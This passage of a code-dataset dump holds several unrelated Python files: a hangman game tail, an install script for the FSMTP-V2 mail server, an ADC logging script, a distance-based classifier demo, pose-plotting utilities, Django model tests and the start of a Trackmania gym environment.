The secret word is \"' + secret_word + '\"! You have won!')\n game_is_done = True\n else:\n missed_letters = missed_letters + guess\n\n # Check if player has guessed too many times and lost.\n if len(missed_letters) == len(sketch.HANGMAN_PICS) - 1:\n operative.display_board(missed_letters, correct_letters, secret_word)\n print('You have run out of guesses!\\nAfter '\n + str(len(missed_letters))\n + ' missed guesses and '\n + str(len(correct_letters))\n + ' correct guesses, the word was \"'\n + secret_word + '\"')\n game_is_done = True\n\n # Ask the player if they want to play again (but only if the game is done).\n if game_is_done:\n if operative.play_again():\n missed_letters = ''\n correct_letters = ''\n game_is_done = False\n secret_word = (\n RandomWords()\n .get_random_word(\n hasDictionaryDef=\"true\",\n maxLength=max_length\n )\n )\n else:\n break\n","repo_name":"troutrun/Invent-Game-Python","sub_path":"hangman-game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24607429594","text":"#!/bin/python3\n\nimport platform\nimport argparse\nfrom enum import Enum\nimport sys\nimport os\n\nTHREADS=4\n\nclass InstallationTemplate(Enum):\n\tDebianLinux = 0\n\tArchLinux = 1\n\tUnknownLinux = 2\n\tAlpineLinux = 3\n\n\tdef detect():\n\t\tsystem = platform.system().lower()\n\t\trelease = platform.release().lower()\n\n\t\tprint(f'Detecting platform for \\'{system}\\' -> \\'{release}\\'')\n\n\t\tif system == 'linux':\n\t\t\tif release.find('alpine'):\n\t\t\t\treturn InstallationTemplate.AlpineLinux\n\t\t\telif release.find('arch') or release.find('manjaro'):\n\t\t\t\treturn InstallationTemplate.ArchLinux\n\t\t\telif release.find('ubuntu') or release.find('debian'):\n\t\t\t\treturn InstallationTemplate.DebianLinux\n\t\t\telse:\n\t\t\t\tprint(f'Your current linux distro \\'{release}\\' is not supported yet')\n\t\t\t\treturn InstallationTemplate.UnknownLinux\n\t\telse:\n\t\t\tprint('{system} is not supported by FSMTP-V2')\n\n\ndef install_repository(url, dir):\n\tprint(f'Installing repository \\'{url}\\' into \\'{dir}\\'')\n\n\tos.system('mkdir -p ./dependencies')\n\tos.chdir('./dependencies')\n\tos.system(f'git clone --recursive {url} ./{dir}')\n\tos.chdir(f'./{dir}')\n\tos.system('mkdir -p ./build')\n\tos.chdir('./build')\n\tos.system(f'cmake ../ && make -j {THREADS} && make install')\n\tos.chdir('../../../')\n\ndef install_dependencies(template):\n\tcommands = list()\n\n\tif (template == InstallationTemplate.ArchLinux):\n\t\tcommands.append('pacman -Syyy');\n\t\tcommands.append('pacman -S meson ninja python python-pip gcc make cmake openssl pkg-config')\n\telif (template == InstallationTemplate.DebianLinux):\n\t\tcommands.append('apt-get update')\n\t\tcommands.append('apt-get upgrade')\n\t\tcommands.append('apt-get install ninja-build meson python3 python3-pip gcc make cmake openssl pkg-config')\n\telif (template == InstallationTemplate.AlpineLinux):\n\t\tcommands.append('apk add build-base openssl meson make cmake ninja git libuv')\n\n\tcommands.append('ldconfig')\n\tcommands.append('pip3 install pyOpenSSL cassandra-driver || pip install pyOpenSSL cassandra-driver')\n\n\tprint(f'[DEPENDENCIES] Starting execution of {len(commands)} commands')\n\tfor i, command in enumerate(commands):\n\t\tprint(f'{i} -> Executing command \\'{command}\\'')\n\t\tos.system(command)\n\n\ndef install():\n\tcommands = list()\n\n\tcommands.append('mkdir -p env && mkdir -p 
env/keys')\n\tcommands.append('python ./initdb.py')\n\tcommands.append('python ./gencert.py')\n\n\tcommands.append('mkdir -p env && touch env/meson.build')\n\tcommands.append('meson build && cd ./build && ninja')\n\n\tprint(f'Starting execution of {len(commands)} commands')\n\tfor i, command in enumerate(commands):\n\t\tprint(f'{i} -> Executing command \\'{command}\\'')\n\t\tos.system(command)\n\n\"\"\"\n\tStarts the installation\n\"\"\"\n\ntemplate = InstallationTemplate.detect()\nprint(f'Detected template: {template}')\nif (template == InstallationTemplate.UnknownLinux):\n\tsys.exit(0)\n\ninstall_dependencies(template)\ninstall_repository('https://github.com/onqtam/doctest', 'doctest')\ninstall_repository('https://github.com/nickbruun/hayai', 'hayai')\ninstall_repository('https://github.com/nlohmann/json', 'json')\ninstall_repository('https://github.com/open-source-parsers/jsoncpp', 'jsoncpp')\ninstall_repository('https://github.com/pantor/inja', 'inja')\ninstall_repository('https://github.com/redis/hiredis', 'hiredis')\ninstall_repository('https://github.com/datastax/cpp-driver', 'cpp-driver')\ninstall_repository('https://github.com/catchorg/Catch2', 'Catch2')\ninstall()\n\n\"\"\"\n\tGenerates and installs the service\n\"\"\"\n\nservice = f\"\"\"[Unit]\nDescription=FSMTP-V2 Email server\n\n[Service]\nType=simple\nExecStart={os.getcwd()}/build/fsmtp\nWorkingDirectory={os.getcwd()}/build\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\"\"\"\n\nwith open('/lib/systemd/system/fsmtp.service', 'w+') as f:\n\tf.write(service)\n\nos.system('systemctl daemon-reload')\nos.system('systemctl enable fsmtp && systemctl start fsmtp')","repo_name":"skywa04885/fsmtp-v2","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"27835537129","text":"from time import time\nfrom data_writer import DataWriter\nfrom adc_board import ADCBoard\nimport logging\nimport argparse\n\n# Parse command-line arguments\nparser = argparse.ArgumentParser(\n    formatter_class=argparse.RawDescriptionHelpFormatter,\n    epilog=\"\")\n\nparser.add_argument('-hz', '--datarate', nargs=1, type=int,\n                    help='sampling rate')\nparser.add_argument('-o', '--output_file', nargs=1,\n                    help='name of outputfile')\n\nargs = parser.parse_args()\n\n# guard against the flags being omitted (args.datarate is None then)\ndatarateinput = args.datarate[0] if args.datarate else None\noutputfileinput = args.output_file[0] if args.output_file else None\n\nlogging.getLogger().setLevel(logging.INFO)\n\ndef read_continously(outputfile, channel_numbers, channel_names, **data_writer_kwargs):\n    adc = ADCBoard()\n    adc.drate = datarateinput if datarateinput is not None else 100\n    writer = DataWriter(outfile=outputfile, columns=channel_names, **data_writer_kwargs)\n    adc.setup_channels(channel_numbers)\n    start_time = time()\n    with writer as w:\n        try:\n            while True:\n                result = adc.read_channels(channel_names[1:])\n                w.write_row(tstamp=time(), **result)\n                if time() - start_time > 1:\n                    logging.info(';' .join(f'{k}={v:.3f} V' for k,v in result.items()))\n                    start_time = time()\n        except KeyboardInterrupt:\n            pass\n\n\nif __name__ == \"__main__\":\n    channel_names = 'tstamp L R U D S_H S_V'.split()\n    channel_numbers = [7,6,5,4,(1,2),(0,2)]\n    outputfile = outputfileinput if outputfileinput is not None else 'outputfile_daq_adc.csv' \n    read_continously(channel_names=channel_names, channel_numbers=channel_numbers, outputfile=outputfile, comments = 
'')","repo_name":"bedakno/extraction_control","sub_path":"Python/data_acquisition/daq_adc.py","file_name":"daq_adc.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22550816928","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom distance_meter import MinkovskyMeter, Furthest, SumabsMeter\nfrom distance_meter import Centroid\n\nclasses = np.array(\n [[[0.05, 0.91],\n [0.14, 0.96],\n [0.16, 0.9],\n [0.07, 0.7],\n [0.2, 0.63]],\n\n [[0.49, 0.89],\n [0.34, 0.81],\n [0.36, 0.67],\n [0.47, 0.49],\n [0.52, 0.53]],\n\n [[0.62, 0.83],\n [0.79, 0.92],\n [0.71, 0.92],\n [0.78, 0.83],\n [0.87, 0.92]],\n\n [[0.55, 0.4],\n [0.66, 0.32],\n [0.74, 0.49],\n [0.89, 0.3],\n [0.77, 0.2]],\n\n [[0.31, 0.43],\n [0.45, 0.27],\n [0.33, 0.16],\n [0.56, 0.29],\n [0.54, 0.13]],\n\n [[0.05, 0.15],\n [0.09, 0.39],\n [0.13, 0.51],\n [0.25, 0.34],\n [0.15, 0.36]]])\n\n\ndef user_input():\n while True:\n try:\n x = float(input('enter x value: '))\n y = float(input('enter y value: '))\n return [x, y]\n except ValueError:\n continue\n\ndef classify(lens):\n index = lens.index(min(lens))\n\n return str(index + 1)\n\n\nnew_object = user_input()\nprint('\\n************\\n************\\n')\nprint('\\nMinkovsky lambda=5, centroid')\nlens = [Centroid().calc(new_object, i, MinkovskyMeter(5)) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nprint('\\nMinkovsky labmda=5, furthest')\nlens = [Furthest().calc(new_object, i, MinkovskyMeter(5)) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nprint('\\nSumabs, centroid')\nlens = [Centroid().calc(new_object, i, SumabsMeter()) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nprint('\\nSumabs, furthest')\nlens = [Furthest().calc(new_object, i, SumabsMeter()) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nfor i, class_i in enumerate(classes):\n plt.plot(class_i[:, 0], class_i[:, 1], '*')\n\nplt.legend(['1','2','3','4','5','6'])\nplt.plot(new_object[0], new_object[1], 'X', c='000')\n\nplt.show()\n","repo_name":"SlonSky/ai-labs","sub_path":"001/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71659359479","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2\nimport math, random\n\ndef draw_skeleton_3d_dynamic(pts3d_list, save_dir=None, elev = -90, azim=-90, axis_lim=[-0.5, 0.5]):\n\tif save_dir is not None:\n\t\tif not os.path.exists(save_dir):\n\t\t\tos.makedirs(save_dir)\n\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 10)).tolist()\n\tn_pts = pts3d_list[0].shape[0]\n\n\tfor i,pts3d in enumerate(pts3d_list):\n\t\tax.clear()\n\t\tax.set_xlim(axis_lim)\n\t\tax.set_ylim(axis_lim)\n\t\tax.set_zlim(axis_lim)\n\n\t\t# Draw points:\n\t\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\t\t# Draw edges:\n\t\tfor edge in body_edges:\n\t\t\tif edge[0] < 
n_pts and edge[1] < n_pts:\n\t\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t\tif save_dir is None:\n\t\t\tplt.pause(0.000001)\n\t\telse:\n\t\t\tpath = os.path.join(save_dir, str(i).zfill(5) + '.jpeg')\n\t\t\tfig.savefig(path)#, bbox_inches='tight', pad_inches = 0)\n\n\t\tprint('{}/{} '.format(i+1, len(pts3d_list)), end='\\r')\n\t\t\n\n\tplt.show()\n\ndef draw_skeleton_3d(pts3d, elev = -90, azim=-90, axis_lim=[-0.5, 0.5]):\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\tax.axis('equal')\n\tax.set_xlim(axis_lim)\n\tax.set_ylim(axis_lim)\n\tax.set_zlim(axis_lim)\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 10)).tolist()\n\tn_pts = pts3d.shape[0]\n\n\t# Draw points:\n\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\tfor edge in body_edges:\n\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\tplt.show()\n\n\ndef draw_skeleton_2d(pts2d, canvas_shape=(1080,1920,3), draw_indices=None, name='canvas', show=True, background=(0,0,0)):\n\tbones = np.asarray([1,3,0,-1,2,7,5,9,6,-1,8,5,6,11,12,13,14])\n\t# body_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcanvas = np.zeros(canvas_shape, np.uint8)\n\tcanvas[:] = background\n\n\tfor i in range(len(pts2d)):\n\t\tx = int(round(pts2d[i][0]))\n\t\ty = int(round(pts2d[i][1]))\n\t\tcanvas = cv2.circle(canvas, (x,y), 5, (0,0,255), 5)\n\n\t\tif draw_indices is not None:\n\t\t\t\tfont = cv2.FONT_HERSHEY_SIMPLEX\n\t\t\t\tbottomLeftCornerOfText = (x,y)\n\t\t\t\tfontScale = 1\n\t\t\t\tfontColor = (255,255,255)\n\t\t\t\tlineType = 2\n\t\t\t\tcv2.putText(canvas,str(i), bottomLeftCornerOfText, font, fontScale,fontColor,lineType)\n\n\t\t# for edge in body_edges:\n\t\t# \tx2 = int(round(pts2d[parent_i][0]))\n\t\t# \ty2 = int(round(pts2d[parent_i][1]))\n\t\t# \tif x+y != 0 and x2+y2 != 0:\n\t\t# \t\tcanvas = cv2.line(canvas,(x,y),(x2,y2),(255,0,0),4)\n\t\t# \tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t\tif bones is not None:\n\t\t\tparent_i = bones[i]\n\t\t\tif parent_i >= 0:\n\t\t\t\tx2 = int(round(pts2d[parent_i][0]))\n\t\t\t\ty2 = int(round(pts2d[parent_i][1]))\n\t\t\t\tif x+y != 0 and x2+y2 != 0:\n\t\t\t\t\tcanvas = cv2.line(canvas,(x,y),(x2,y2),(255,0,0),4)\n\n\tif show:\n\t\tcv2.imshow(name,canvas)\n\t\tcv2.waitKey()\n\n\treturn canvas\n\n\ndef draw_skeleton_3d_with_sphere(pts3d, sphere, elev = -90, azim=-90, axis_lim=[-0.5, 0.5]):\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\tax.axis('equal')\n\tax.set_xlim(axis_lim)\n\tax.set_ylim(axis_lim)\n\tax.set_zlim(axis_lim)\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 10)).tolist()\n\tn_pts = pts3d.shape[0]\n\n\t# Draw points:\n\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\tfor edge in 
body_edges:\n\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t# Draw sphere:\n\tax.plot(*zip(*sphere), marker='o', color='g', ls='', markersize=3)\n\n\tplt.show()\n\n\ndef draw_skeleton_3d_dynamic_with_object(pts3d_list, save_dir=None, elev = -90, azim=-90, axis_lim=[-0.5, 0.5], object_type='sphere'):\n\tif save_dir is not None:\n\t\tif not os.path.exists(save_dir):\n\t\t\tos.makedirs(save_dir)\n\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcube_edges = np.array([[0,1],[1,2],[2,3],[3,0],[4,5],[5,6],[6,7],[7,4],[0,4],[1,5],[2,6],[3,7]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 20)).tolist()\n\tn_pts = pts3d_list[0][0].shape[0]\n\n\tfor i,(pts3d,object_pts) in enumerate(pts3d_list):\n\t\tax.clear()\n\t\tax.set_xlim(axis_lim)\n\t\tax.set_ylim(axis_lim)\n\t\tax.set_zlim(axis_lim)\n\n\t\t# Draw points:\n\t\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\t\t# Draw edges:\n\t\tfor edge in body_edges:\n\t\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t\t# Draw object:\n\t\tax.plot(*zip(*object_pts), marker='o', color='g', ls='', markersize=3)\n\n\t\tif object_type == 'cube':\n\t\t\tfor j,edge in enumerate(cube_edges):\n\t\t\t\tax.plot(object_pts[edge,0], object_pts[edge,1], object_pts[edge,2], color=colors[j])\n\n\t\tif save_dir is None:\n\t\t\tplt.pause(0.000001)\n\t\telse:\n\t\t\tpath = os.path.join(save_dir, str(i).zfill(5) + '.jpeg')\n\t\t\tfig.savefig(path)#, bbox_inches='tight', pad_inches = 0)\n\n\t\tprint('{}/{} '.format(i+1, len(pts3d_list)), end='\\r')\n\t\t\n\n\tplt.show()\n\ndef draw_cube_2d(obj2d_pts, canvas):\n\tcube_edges = np.array([[0,1],[1,2],[2,3],[3,0],[4,5],[5,6],[6,7],[7,4],[0,4],[1,5],[2,6],[3,7]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 20)).tolist()\n\n\tfor pi in range(obj2d_pts.shape[0]):\n\t\tx = int(round(obj2d_pts[pi,0]))\n\t\ty = int(round(obj2d_pts[pi,1]))\n\t\tcv2.circle(canvas, (x,y), 5, (0,255,0), 5)\n\n\tfor j,edge in enumerate(cube_edges):\n\t\tpt1 = (int(round(obj2d_pts[cube_edges[j,0],0])), int(round(obj2d_pts[cube_edges[j,0],1])))\n\t\tpt2 = (int(round(obj2d_pts[cube_edges[j,1],0])), int(round(obj2d_pts[cube_edges[j,1],1])))\n\t\tcv2.line(canvas, pt1, pt2, color=colors[j], thickness=2)\n\n\treturn canvas\n\ndef generate_fibonacci_sphere(num_pts=100,randomize=True, axis_lim =[-2.0,2.0], draw=False):\n\t\n\t# Generate sphere points:\n\trnd = 1.\n\tif randomize:\n\t\trnd = random.random() * num_pts\n\n\tpoints = np.empty((num_pts,3), dtype=np.float32)\n\toffset = 2./num_pts\n\tincrement = math.pi * (3. 
- math.sqrt(5.));\n\n\tfor i in range(num_pts):\n\t\ty = ((i * offset) - 1) + (offset / 2);\n\t\tr = math.sqrt(1 - pow(y,2))\n\n\t\tphi = ((i + rnd) % num_pts) * increment\n\n\t\tx = math.cos(phi) * r\n\t\tz = math.sin(phi) * r\n\n\t\tpoints[i,:] = (x,y,z)\n\n\t# Draw:\n\tif draw:\n\t\tplt.rcParams['image.interpolation'] = 'nearest'\n\t\tfig = plt.figure()\n\t\tax = fig.add_subplot(111, projection='3d')\n\t\tax.view_init(elev = -90, azim=-90)\n\t\tax.set_xlim(axis_lim)\n\t\tax.set_ylim(axis_lim)\n\t\tax.set_zlim(axis_lim)\n\n\t\tax.axis('equal')\n\t\tax.plot(*zip(*points), marker='o', color='r', ls='')\n\t\tplt.show()\n\n\treturn points\n\n\ndef transform_sphere(points, offset=(0.0,0.0,0.0), scale=1.0):\n\tfor i in range(points.shape[0]):\n\t\tpoints[i] = points[i]*scale + offset\n\n\treturn points\n\ndef generate_cube():\n\t'''\n 4_______5 \n /. /|\n 0 /_.___1/ |\n\t| . | |\n\t| 7----|-/6\n |______|/\n 3 2\n\t'''\n\tpoints = np.empty((8,3), dtype=np.float32)\n\tstep = 0.5\n\tpoints[0,:] = (-step, step, step)\n\tpoints[1,:] = ( step, step, step)\n\tpoints[2,:] = ( step,-step, step)\n\tpoints[3,:] = (-step,-step, step)\n\tpoints[4,:] = (-step, step,-step)\n\tpoints[5,:] = ( step, step,-step)\n\tpoints[6,:] = ( step,-step,-step)\n\tpoints[7,:] = (-step,-step,-step)\n\n\treturn points\n\n\n","repo_name":"darkAlert/multi-view-pose-3d","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"10994786896","text":"\"\"\"\nItem Model Test\n===============\n\nThis module provides complete testing for all Item's model functions.\n\"\"\"\n\nimport datetime\nfrom unittest import mock\nfrom django.test import TestCase\nfrom authentication.models import CustomUser\nfrom curriculum.models import Curriculum\nfrom item.models import Item\nfrom team.models import Team\nfrom topic.models import Topic\n\n\nTEST_TIME = datetime.datetime(2016, 10, 15, 8, 15, 12)\n\n\nclass ItemModelTestCase(TestCase):\n \"\"\"TestCase for providing Item model testing\"\"\"\n\n def setUp(self):\n \"\"\"Method that provides preparation before testing Item model's features.\"\"\"\n\n with mock.patch('django.utils.timezone.now') as mock_time:\n mock_time.return_value = TEST_TIME\n\n custom_user_first = CustomUser(id=101,\n first_name='john',\n last_name='doe',\n middle_name='eric',\n email='email',\n password='123456')\n custom_user_first.save()\n custom_user_second = CustomUser(id=102,\n first_name='eric',\n last_name='moreno',\n middle_name='mike',\n email='test@email',\n password='123456')\n custom_user_second.save()\n\n custom_user_third = CustomUser(id=103,\n first_name='pablo',\n last_name='martines',\n middle_name='jo',\n email='sometest@email',\n password='123456')\n custom_user_third.save()\n\n team = Team(id=101,\n owner=custom_user_first,\n name='Coldplay')\n team.save()\n team.members.add(custom_user_first, custom_user_second)\n\n curriculum = Curriculum.objects.create(id=101,\n name=\"testcurriculum\",\n goals=[\"goal1\", \"goal2\"],\n description=\"test_descr\")\n curriculum.save()\n\n topic_python = Topic(id=101,\n curriculum=curriculum,\n title='Python',\n description='My awesome topic')\n topic_python.save()\n topic_python.mentors.add(custom_user_first, custom_user_third)\n\n topic_html = Topic(id=102,\n curriculum=curriculum,\n title='HTML',\n description='My another awesome topic')\n topic_html.save()\n topic_html.mentors.add(custom_user_third)\n\n item_first 
= Item(id=101,\n name='read documentation',\n form=0,\n topic=topic_python)\n item_first.save()\n item_first.authors.add(custom_user_first, custom_user_third)\n\n item_second = Item(id=102,\n name='pass test',\n form=1,\n topic=topic_python,\n estimation=datetime.timedelta(seconds=54000))\n item_second.save()\n item_second.authors.add(custom_user_first)\n\n item_third = Item(id=103,\n name='watch videos',\n form=0,\n topic=topic_html,\n description='test',\n estimation=datetime.timedelta(seconds=1104000))\n item_third.save()\n item_third.authors.add(custom_user_first, custom_user_third)\n item_third.superiors.add(item_first, item_second)\n\n def test_item_repr(self):\n \"\"\"Method that test `__repr__` magic method of Item instance object.\"\"\"\n\n item = Item.objects.get(id=103)\n actual_repr = item.__repr__()\n expected_repr = ('Item(id=103)')\n self.assertEqual(actual_repr, expected_repr)\n\n def test_item_str(self):\n \"\"\"Method that test `__str__` magic method of Item instance object.\"\"\"\n\n item = Item.objects.get(id=101)\n actual_repr = item.__str__()\n expected_repr = (\"'id': 101, 'name': 'read documentation', 'authors': [101, 103], \"\n \"'topic': 101, 'form': 0, 'superiors': [], 'description': '', \"\n \"'estimation': None, 'created_at': 1476508512, 'updated_at': 1476508512\")\n self.assertEqual(actual_repr, expected_repr)\n\n def test_item_to_dict(self):\n \"\"\"\n Method that tests `to_dict` method of certain Item instance.\n\n Function tests Item instance with all filled parameters.\n \"\"\"\n\n item = Item.objects.get(id=103)\n expected_item_dict = {'id': 103,\n 'name': 'watch videos',\n 'authors': [101, 103],\n 'topic': 102,\n 'form': 0,\n 'superiors': [101, 102],\n 'description': 'test',\n 'estimation': 1104000,\n 'created_at': 1476508512,\n 'updated_at': 1476508512}\n actual_item_dict = item.to_dict()\n actual_item_dict['authors'].sort()\n actual_item_dict['superiors'].sort()\n self.assertDictEqual(actual_item_dict, expected_item_dict)\n\n def test_item_success_get_by_id(self):\n \"\"\"Method that tests succeeded `get_by_id` method of Item class object.\"\"\"\n\n actual_item = Item.get_by_id(102)\n expected_item = Item.objects.get(id=102)\n self.assertEqual(actual_item, expected_item)\n\n def test_item_none_get_by_id(self):\n \"\"\"Method that tests unsucceeded `get_by_id` method of Item class object.\"\"\"\n\n actual_item = Item.get_by_id(123)\n self.assertIsNone(actual_item)\n\n def test_item_success_create(self):\n \"\"\"Method that tests succeeded `create` method of Item class object.\"\"\"\n\n user_first = CustomUser.objects.get(id=101)\n user_second = CustomUser.objects.get(id=102)\n users = [user_first, user_second]\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n topic = Topic.objects.get(id=101)\n time = datetime.timedelta(seconds=66000)\n item = Item.create(name='new', authors=users, topic=topic,\n form=1, superiors=superiors, estimation=time)\n self.assertIsInstance(item, Item)\n self.assertEqual(item.name, 'new')\n self.assertEqual(item.topic.id, 101)\n self.assertEqual(item.form, 1)\n self.assertListEqual(list(item.authors.all()), users)\n self.assertListEqual(list(item.superiors.all()), superiors)\n self.assertEqual(item.description, '')\n self.assertEqual(item.estimation, time)\n\n def test_item_none_create(self):\n \"\"\"Method that tests unsucceeded `create` method of Item class object.\"\"\"\n\n author = CustomUser.objects.get(id=101)\n topic = 
Topic.objects.get(id=101)\n item = Item.create(name='test', authors=[author], topic=topic, form='str')\n self.assertIsNone(item)\n\n def test_item_update(self):\n \"\"\"\n Method that tests `update` method of the certain Item instance.\n\n Test for updating all attributes.\n \"\"\"\n\n estimation = datetime.timedelta(seconds=104000)\n actual_item = Item.objects.get(id=101)\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n actual_item.update(name='listen book',\n form=2,\n description='updated description',\n estimation=estimation,\n superiors=superiors)\n expected_item = Item.objects.get(id=101)\n self.assertEqual(actual_item, expected_item)\n self.assertEqual(actual_item.name, 'listen book')\n self.assertEqual(actual_item.form, 2)\n self.assertEqual(actual_item.description, 'updated description')\n self.assertEqual(actual_item.estimation, estimation)\n #\n self.assertListEqual(list(actual_item.superiors.all()), superiors)\n\n\n def test_item_add_authors(self):\n \"\"\"\n Method that tests `update_authors` method of the certain Item instance.\n\n Test for adding authors.\n \"\"\"\n\n actual_item = Item.objects.get(id=101)\n user_first = CustomUser.objects.get(id=101)\n user_second = CustomUser.objects.get(id=102)\n users = [user_first, user_second]\n actual_item.update_authors(authors_add=users)\n expected_item = Item.objects.get(id=101)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_remove_authors(self):\n \"\"\"\n Method that tests `update_authors` method of the certain Item instance.\n\n Test for removing authors.\n \"\"\"\n\n actual_item = Item.objects.get(id=103)\n user_first = CustomUser.objects.get(id=101)\n user_second = CustomUser.objects.get(id=102)\n users = [user_first, user_second]\n actual_item.update_authors(authors_del=users)\n expected_item = Item.objects.get(id=103)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_add_superiors(self):\n \"\"\"\n Method that tests `update_superiors` method of the certain Item instance.\n\n Test for adding superiors.\n \"\"\"\n\n actual_item = Item.objects.get(id=101)\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n actual_item.update_superiors(superiors_add=superiors)\n expected_item = Item.objects.get(id=101)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_remove_superiors(self):\n \"\"\"\n Method that tests `update_superiors` method of the certain Item instance.\n\n Test for removing superiors.\n \"\"\"\n\n actual_item = Item.objects.get(id=103)\n superior_first = Item.objects.get(id=102)\n superior_second = Item.objects.get(id=103)\n superiors = [superior_first, superior_second]\n actual_item.update_superiors(superiors_del=superiors)\n expected_item = Item.objects.get(id=103)\n self.assertListEqual(list(actual_item.authors.all()), list(expected_item.authors.all()))\n\n def test_item_success_delete(self):\n \"\"\"Method that tests succeeded `delete_by_id` method of Item class object.\"\"\"\n\n is_item_delete = Item.delete_by_id(101)\n self.assertTrue(is_item_delete)\n self.assertRaises(Item.DoesNotExist, Item.objects.get, pk=101)\n\n def test_item_none_delete(self):\n \"\"\"Method that tests unsucceeded `delete_by_id` method of Item class object.\"\"\"\n\n is_item_delete = 
Item.delete_by_id(188)\n self.assertIsNone(is_item_delete)\n","repo_name":"lv275python/eventually.api","sub_path":"eventually/tests/unittests/item/testmodel.py","file_name":"testmodel.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"18828335898","text":"from gymnasium import Env, spaces\n\nimport numpy as np\nimport math\nimport time\n\nfrom stable_baselines3.common.env_checker import check_env\n\nfrom MapExtractor import get_map_data\n\nfrom Commands import (\n tm_accelerate,\n tm_brake,\n tm_steer,\n tm_reset,\n tm_respawn,\n tm_update\n)\n\nfrom GameDataGetter import GameDataGetter\nfrom TrackVisualizer import TrackVisualizer\n\n\nclass TrackmaniaEnv(Env):\n\n\n def __init__(self, map_path:str, obs_history:int=0, action_history:int=2, action_duration:float=0.05, obs_duration:float=0.0021, start_delay:float=1.9, human_driver:bool=False):\n \"\"\"Gym(nasium) compatible env for imitation/reinforcement learning in 